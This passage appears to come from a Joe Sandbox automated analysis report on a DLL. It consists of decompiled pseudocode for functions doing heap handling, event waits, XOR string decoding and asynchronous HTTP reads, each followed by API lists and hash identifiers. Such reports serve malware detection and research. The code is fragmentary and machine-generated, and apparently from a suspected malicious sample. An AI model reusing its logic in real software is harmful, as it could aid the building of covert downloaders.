                                                                                                                                                                                                                                    							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                                                                                                                                                                                                    								_t74 = _t74 | 0xffffffff;
                                                                                                                                                                                                                                    								_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t74 =  *_t99;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t106 = _t107 + _a8 * 4 - 0xe8;
                                                                                                                                                                                                                                    						_a12 = _t74;
                                                                                                                                                                                                                                    						_t76 = E02F91FB1(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                                    							 *_t99 =  *_t99 - _t76;
                                                                                                                                                                                                                                    							if( *_t99 != 0) {
                                                                                                                                                                                                                                    								goto L14;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							L13:
                                                                                                                                                                                                                                    							_t92 =  &_v92;
                                                                                                                                                                                                                                    							if(E02F98B62(_t79, _t92, _t106) < 0) {
                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                                                    							_a12 = _a12 + 1;
                                                                                                                                                                                                                                    							_t76 = E02F99100(_t79,  &_v92, _t106, _t106);
                                                                                                                                                                                                                                    							 *_t99 =  *_t99 - _t76;
                                                                                                                                                                                                                                    							if( *_t99 != 0) {
                                                                                                                                                                                                                                    								goto L14;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_a8 = _a8 - 1;
                                                                                                                                                                                                                                    						_t66 = _a12;
                                                                                                                                                                                                                                    						_t99 = _t99 - 4;
                                                                                                                                                                                                                                    						 *(0x2f9d1b0 + _a8 * 4) = _t66;
                                                                                                                                                                                                                                    					} while (_a8 >= 0);
                                                                                                                                                                                                                                    					_t97 = _v12;
                                                                                                                                                                                                                                    					goto L17;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				while(_t81 < _t96) {
                                                                                                                                                                                                                                    					_t81 = _t81 + 1;
                                                                                                                                                                                                                                    					_t56 = _t56 >> 1;
                                                                                                                                                                                                                                    					if(_t56 != 0) {
                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					goto L4;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				goto L4;
                                                                                                                                                                                                                                    			}


                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 02F910C4
                                                                                                                                                                                                                                    • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 02F910DA
                                                                                                                                                                                                                                    • memset.NTDLL ref: 02F9117A
                                                                                                                                                                                                                                    • memset.NTDLL ref: 02F9118A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$_allmul_aulldiv
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3041852380-0
                                                                                                                                                                                                                                    • Opcode ID: 525008a217d961cd222467a00e25274daa9dec5184e190afb970de5d3833c119
                                                                                                                                                                                                                                    • Instruction ID: 35c71e631f845620da1a94be6de534aaf72e65c977ac48e90e540dcc496376b0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 525008a217d961cd222467a00e25274daa9dec5184e190afb970de5d3833c119
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8941B171A0024AABFF10DFA8DC44BEF7779EF44790F108539EA1AA7190DB71A9448F80
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,00000008,76D24D40), ref: 02F9A9BD
                                                                                                                                                                                                                                      • Part of subcall function 02F92049: RtlAllocateHeap.NTDLL(00000000,00000000,02F97E50), ref: 02F92055
                                                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 02F9AA31
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02F9AA54
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02F9AAFF
                                                                                                                                                                                                                                      • Part of subcall function 02F99039: HeapFree.KERNEL32(00000000,00000000,02F97F18,00000000,?,?,00000000), ref: 02F99045
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 943265810-0
                                                                                                                                                                                                                                    • Opcode ID: b5a1545aa241ab50631ea4a1d0cdb5984260ebb7ba7e2c520a14285794170a7a
                                                                                                                                                                                                                                    • Instruction ID: b0d0a8ccccb023b8dfb17f9172ff451eecea0d3f3d8e9bd9dfeb7d065aae5962
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5a1545aa241ab50631ea4a1d0cdb5984260ebb7ba7e2c520a14285794170a7a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB415172940208BFFB319F66DD49E6BBBBDEB89784F104919F252D10A0E7719994CB20
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 39%
                                                                                                                                                                                                                                    			E02F939BF(void* __eax, void* __ecx) {
                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				intOrPtr _t36;
                                                                                                                                                                                                                                    				intOrPtr* _t37;
                                                                                                                                                                                                                                    				intOrPtr* _t39;
                                                                                                                                                                                                                                    				void* _t53;
                                                                                                                                                                                                                                    				long _t58;
                                                                                                                                                                                                                                    				void* _t59;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t53 = __ecx;
                                                                                                                                                                                                                                    				_t59 = __eax;
                                                                                                                                                                                                                                    				_t58 = 0;
                                                                                                                                                                                                                                    				ResetEvent( *(__eax + 0x1c));
                                                                                                                                                                                                                                    				_push( &_v8);
                                                                                                                                                                                                                                    				_push(4);
                                                                                                                                                                                                                                    				_push( &_v20);
                                                                                                                                                                                                                                    				_push( *((intOrPtr*)(_t59 + 0x18)));
                                                                                                                                                                                                                                    				if( *0x2f9d134() != 0) {
                                                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                                                    					if(_v8 == 0) {
                                                                                                                                                                                                                                    						 *((intOrPtr*)(_t59 + 0x30)) = 0;
                                                                                                                                                                                                                                    						L21:
                                                                                                                                                                                                                                    						return _t58;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					 *0x2f9d168(0, 1,  &_v12);
                                                                                                                                                                                                                                    					if(0 != 0) {
                                                                                                                                                                                                                                    						_t58 = 8;
                                                                                                                                                                                                                                    						goto L21;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t36 = E02F92049(0x1000);
                                                                                                                                                                                                                                    					_v16 = _t36;
                                                                                                                                                                                                                                    					if(_t36 == 0) {
                                                                                                                                                                                                                                    						_t58 = 8;
                                                                                                                                                                                                                                    						L18:
                                                                                                                                                                                                                                    						_t37 = _v12;
                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t37 + 8))(_t37);
                                                                                                                                                                                                                                    						goto L21;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                    					_push(_v8);
                                                                                                                                                                                                                                    					_push( &_v20);
                                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                                    						_t39 = _v12;
                                                                                                                                                                                                                                    						_t56 =  *_t39;
                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
                                                                                                                                                                                                                                    						ResetEvent( *(_t59 + 0x1c));
                                                                                                                                                                                                                                    						_push( &_v8);
                                                                                                                                                                                                                                    						_push(0x1000);
                                                                                                                                                                                                                                    						_push(_v16);
                                                                                                                                                                                                                                    						_push( *((intOrPtr*)(_t59 + 0x18)));
                                                                                                                                                                                                                                    						if( *0x2f9d134() != 0) {
                                                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t58 = GetLastError();
                                                                                                                                                                                                                                    						if(_t58 != 0x3e5) {
                                                                                                                                                                                                                                    							L15:
                                                                                                                                                                                                                                    							E02F99039(_v16);
                                                                                                                                                                                                                                    							if(_t58 == 0) {
                                                                                                                                                                                                                                    								_t58 = E02F97A07(_v12, _t59);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							goto L18;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t58 = E02F91C47( *(_t59 + 0x1c), _t56, 0xffffffff);
                                                                                                                                                                                                                                    						if(_t58 != 0) {
                                                                                                                                                                                                                                    							goto L15;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                                                                                                                                                                                                                    						if(_t58 != 0) {
                                                                                                                                                                                                                                    							goto L15;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						L13:
                                                                                                                                                                                                                                    						_t58 = 0;
                                                                                                                                                                                                                                    						if(_v8 == 0) {
                                                                                                                                                                                                                                    							goto L15;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                                                    						_push(_v8);
                                                                                                                                                                                                                                    						_push(_v16);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t58 = GetLastError();
                                                                                                                                                                                                                                    				if(_t58 != 0x3e5) {
                                                                                                                                                                                                                                    					L4:
                                                                                                                                                                                                                                    					if(_t58 != 0) {
                                                                                                                                                                                                                                    						goto L21;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					goto L5;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t58 = E02F91C47( *(_t59 + 0x1c), _t53, 0xffffffff);
                                                                                                                                                                                                                                    				if(_t58 != 0) {
                                                                                                                                                                                                                                    					goto L21;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                                                                                                                                                                                                                    				goto L4;
                                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 02F939D5
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02F939EE
                                                                                                                                                                                                                                      • Part of subcall function 02F91C47: WaitForMultipleObjects.KERNEL32(00000002,02F9AA72,00000000,02F9AA72,?,?,?,02F9AA72,0000EA60), ref: 02F91C62
                                                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 02F93A67
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02F93A82
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorEventLastReset$MultipleObjectsWait
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2394032930-0
                                                                                                                                                                                                                                    • Opcode ID: 4b805bb95e4f13e1244510d1fa6e74fe81655207a8ceda726d6b45cda690f622
                                                                                                                                                                                                                                    • Instruction ID: 2a4c2098c8f28113aa87c58c0c6c785a27d3b633afd273ef761b91560f65e5eb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b805bb95e4f13e1244510d1fa6e74fe81655207a8ceda726d6b45cda690f622
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D431C936E00604ABEF22DBA5DC44F6EB7BAEF887E4F1005A9E615D7190E730E945CB10
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                                                    			E02F942EA(signed int _a4, signed int* _a8) {
                                                                                                                                                                                                                                    				void* __ecx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				signed int _t6;
                                                                                                                                                                                                                                    				intOrPtr _t8;
                                                                                                                                                                                                                                    				intOrPtr _t12;
                                                                                                                                                                                                                                    				short* _t19;
                                                                                                                                                                                                                                    				void* _t25;
                                                                                                                                                                                                                                    				void* _t26;
                                                                                                                                                                                                                                    				signed int* _t28;
                                                                                                                                                                                                                                    				CHAR* _t30;
                                                                                                                                                                                                                                    				long _t31;
                                                                                                                                                                                                                                    				intOrPtr* _t32;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t6 =  *0x2f9d270; // 0xd448b889
                                                                                                                                                                                                                                    				_t32 = _a4;
                                                                                                                                                                                                                                    				_a4 = _t6 ^ 0x109a6410;
                                                                                                                                                                                                                                    				_t8 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    				_t3 = _t8 + 0x2f9e862; // 0x61636f4c
                                                                                                                                                                                                                                    				_t25 = 0;
                                                                                                                                                                                                                                    				_t30 = E02F97A9A(_t3, 1);
                                                                                                                                                                                                                                    				if(_t30 != 0) {
                                                                                                                                                                                                                                    					_t25 = CreateEventA(0x2f9d2a8, 1, 0, _t30);
                                                                                                                                                                                                                                    					E02F99039(_t30);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t12 =  *0x2f9d25c; // 0x2000000a
                                                                                                                                                                                                                                    				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E02F9757F() != 0) {
                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                    					_t28 = _a8;
                                                                                                                                                                                                                                    					if(_t28 != 0) {
                                                                                                                                                                                                                                    						 *_t28 =  *_t28 | 0x00000001;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t31 = E02F9205E(_t32, _t26);
                                                                                                                                                                                                                                    					if(_t31 == 0 && _t25 != 0) {
                                                                                                                                                                                                                                    						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_t28 != 0 && _t31 != 0) {
                                                                                                                                                                                                                                    						 *_t28 =  *_t28 & 0xfffffffe;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t19 =  *0x2f9d0f0( *_t32, 0x20);
                                                                                                                                                                                                                                    					if(_t19 != 0) {
                                                                                                                                                                                                                                    						 *_t19 = 0;
                                                                                                                                                                                                                                    						_t19 = _t19 + 2;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t31 = E02F9A501(0,  *_t32, _t19, 0);
                                                                                                                                                                                                                                    					if(_t31 == 0) {
                                                                                                                                                                                                                                    						if(_t25 == 0) {
                                                                                                                                                                                                                                    							L22:
                                                                                                                                                                                                                                    							return _t31;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                                                                                                                                                                    						if(_t31 == 0) {
                                                                                                                                                                                                                                    							L20:
                                                                                                                                                                                                                                    							if(_t25 != 0) {
                                                                                                                                                                                                                                    								CloseHandle(_t25);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							goto L22;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}
















                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 02F97A9A: lstrlen.KERNEL32(02F923E9,00000000,00000000,00000027,00000005,00000000,00000000,02F996DA,74666F53,00000000,02F923E9,02F9D00C,?,02F923E9), ref: 02F97AD0
                                                                                                                                                                                                                                      • Part of subcall function 02F97A9A: lstrcpy.KERNEL32(00000000,00000000), ref: 02F97AF4
                                                                                                                                                                                                                                      • Part of subcall function 02F97A9A: lstrcat.KERNEL32(00000000,00000000), ref: 02F97AFC
                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(02F9D2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,02F93CA0,?,00000001,?), ref: 02F9432B
                                                                                                                                                                                                                                      • Part of subcall function 02F99039: HeapFree.KERNEL32(00000000,00000000,02F97F18,00000000,?,?,00000000), ref: 02F99045
                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00004E20,02F93CA0,00000000,00000000,?,00000000,?,02F93CA0,?,00000001,?,?,?,?,02F96880), ref: 02F94389
                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,02F93CA0,?,00000001,?), ref: 02F943B7
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,02F93CA0,?,00000001,?,?,?,?,02F96880), ref: 02F943CF
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
• Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
• Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
• Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 73268831-0
                                                                                                                                                                                                                                    • Opcode ID: ac36d348cbf18942477f7132586987f17d44d56b180bbcf31a1c021dbab85eac
                                                                                                                                                                                                                                    • Instruction ID: d027a52ab59715269ed5c3dc0822eaefc7afe8352b45d1157714750185aa5f7b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac36d348cbf18942477f7132586987f17d44d56b180bbcf31a1c021dbab85eac
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40213432D403159BEF316FB8AC44F6AB3E9AB98BD4F150615FF55DB100D761C8129690
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 38%
                                                                                                                                                                                                                                    			E02F9A0B2(void* __ecx, void* __esi) {
                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                    				long _v12;
                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                    				long _v20;
                                                                                                                                                                                                                                    				long _t34;
                                                                                                                                                                                                                                    				long _t39;
                                                                                                                                                                                                                                    				long _t42;
                                                                                                                                                                                                                                    				long _t56;
                                                                                                                                                                                                                                    				intOrPtr _t58;
                                                                                                                                                                                                                                    				void* _t59;
                                                                                                                                                                                                                                    				intOrPtr* _t60;
                                                                                                                                                                                                                                    				void* _t61;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t61 = __esi;
                                                                                                                                                                                                                                    				_t59 = __ecx;
                                                                                                                                                                                                                                    				_t60 =  *0x2f9d144; // 0x2f9ad81
                                                                                                                                                                                                                                    				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                    					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                                                                                                                                                                                                                    					_v20 = _t34;
                                                                                                                                                                                                                                    					if(_t34 != 0) {
                                                                                                                                                                                                                                    						L3:
                                                                                                                                                                                                                                    						_push( &_v16);
                                                                                                                                                                                                                                    						_push( &_v8);
                                                                                                                                                                                                                                    						_push(_t61 + 0x2c);
                                                                                                                                                                                                                                    						_push(0x20000013);
                                                                                                                                                                                                                                    						_push( *((intOrPtr*)(_t61 + 0x18)));
                                                                                                                                                                                                                                    						_v8 = 4;
                                                                                                                                                                                                                                    						_v16 = 0;
                                                                                                                                                                                                                                    						if( *_t60() == 0) {
                                                                                                                                                                                                                                    							_t39 = GetLastError();
                                                                                                                                                                                                                                    							_v12 = _t39;
                                                                                                                                                                                                                                    							if(_v20 == 0 || _t39 != 0x2ef3) {
                                                                                                                                                                                                                                    								L15:
                                                                                                                                                                                                                                    								return _v12;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								goto L11;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
                                                                                                                                                                                                                                    							goto L11;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_v16 = 0;
                                                                                                                                                                                                                                    							_v8 = 0;
                                                                                                                                                                                                                                    							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
                                                                                                                                                                                                                                    							_t58 = E02F92049(_v8 + 1);
                                                                                                                                                                                                                                    							if(_t58 == 0) {
                                                                                                                                                                                                                                    								_v12 = 8;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_push( &_v16);
                                                                                                                                                                                                                                    								_push( &_v8);
                                                                                                                                                                                                                                    								_push(_t58);
                                                                                                                                                                                                                                    								_push(0x16);
                                                                                                                                                                                                                                    								_push( *((intOrPtr*)(_t61 + 0x18)));
                                                                                                                                                                                                                                    								if( *_t60() == 0) {
                                                                                                                                                                                                                                    									E02F99039(_t58);
                                                                                                                                                                                                                                    									_v12 = GetLastError();
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									 *((char*)(_t58 + _v8)) = 0;
                                                                                                                                                                                                                                    									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							goto L15;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					SetEvent( *(_t61 + 0x1c));
                                                                                                                                                                                                                                    					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                                                                                                                                                                                                                    					_v12 = _t56;
                                                                                                                                                                                                                                    					if(_t56 != 0) {
                                                                                                                                                                                                                                    						goto L15;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					goto L3;
                                                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                                                    					_t42 = E02F91C47( *(_t61 + 0x1c), _t59, 0xea60);
                                                                                                                                                                                                                                    					_v12 = _t42;
                                                                                                                                                                                                                                    				} while (_t42 == 0);
                                                                                                                                                                                                                                    				goto L15;
                                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,76D681D0), ref: 02F9A0C9
                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 02F9A0D9
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02F9A162
                                                                                                                                                                                                                                      • Part of subcall function 02F91C47: WaitForMultipleObjects.KERNEL32(00000002,02F9AA72,00000000,02F9AA72,?,?,?,02F9AA72,0000EA60), ref: 02F91C62
                                                                                                                                                                                                                                      • Part of subcall function 02F99039: HeapFree.KERNEL32(00000000,00000000,02F97F18,00000000,?,?,00000000), ref: 02F99045
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 02F9A197
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 602384898-0
                                                                                                                                                                                                                                    • Opcode ID: 8039e57f6a4b43a8786894369ea3e29f81f7b551263c50741edf90c9b04e8890
                                                                                                                                                                                                                                    • Instruction ID: 17d726844e980715492b04a078293dcbc6962c58d7645c669d3591e15d03a641
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8039e57f6a4b43a8786894369ea3e29f81f7b551263c50741edf90c9b04e8890
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D431CBB5D00209EFFF21DF95CC8099EBBB9EB08784F10496AE642E2151D771AA85DF60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 40%
                                                                                                                                                                                                                                    			E02F93BF1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                                                    				char _v32;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                                                    				void* _t38;
                                                                                                                                                                                                                                    				signed int* _t39;
                                                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t36 = __ecx;
                                                                                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				_v12 = _a4;
                                                                                                                                                                                                                                    				_t38 = E02F99763(__ecx,  &_v32);
                                                                                                                                                                                                                                    				if(_t38 != 0) {
                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                    					_t39 = _a8;
                                                                                                                                                                                                                                    					L13:
                                                                                                                                                                                                                                    					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                                                                                                                                                                                                    						_t16 =  &(_t39[1]); // 0x5
                                                                                                                                                                                                                                    						_t23 = _t16;
                                                                                                                                                                                                                                    						if( *_t16 != 0) {
                                                                                                                                                                                                                                    							E02F9A022(_t23);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					return _t38;
                                                                                                                                                                                                                                    				}
